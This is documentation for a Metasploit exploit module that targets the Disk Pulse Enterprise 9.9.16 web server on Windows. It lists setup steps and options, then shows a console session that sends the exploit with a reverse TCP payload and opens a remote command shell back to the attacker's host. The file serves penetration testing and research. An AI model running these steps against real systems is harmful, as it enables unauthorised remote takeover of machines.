metasploit-gs/documentation/modules/exploit/windows/http/disk_pulse_enterprise_get.md

Vulnerable Application

Tested on Windows 7 x64 and x86.

Install the application from the link below and enable the web server by going to Options -> Server -> Enable Web Server on Port.

Disk Pulse Enterprise v 9.9.16

Verification Steps

1. Install the application and set the option above to enable the web server
2. Start msfconsole
3. Do: use exploit/windows/http/disk_pulse_enterprise_get
4. Set options and payload
5. Do: run
6. You should get a shell.

Options

RHOST

IP address of the remote host running the server.

RPORT

Port that the web server is running on. Default is 80 but it can be changed when setting up the program or in the options.

Scenarios

To obtain a shell:

msf > use exploit/windows/http/disk_pulse_enterprise_get
msf exploit(disk_pulse_enterprise_get) > set payload windows/shell_reverse_tcp
payload => windows/shell_reverse_tcp
msf exploit(disk_pulse_enterprise_get) > set RHOST x.x.x.x
RHOST => x.x.x.x
msf exploit(disk_pulse_enterprise_get) > set LHOST y.y.y.y
LHOST => y.y.y.y
msf exploit(disk_pulse_enterprise_get) > set LPORT 1234
LPORT => 1234
msf exploit(disk_pulse_enterprise_get) > set RPORT 8080
RPORT => 8080
msf exploit(disk_pulse_enterprise_get) > exploit

[*] Started reverse TCP handler on y.y.y.y:1234
[*] Generating exploit...
[*] Sending exploit...
[*] Command shell session 1 opened (y.y.y.y:1234 -> x.x.x.x:64567) at 2017-09-14 10:52:06 -0500

Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>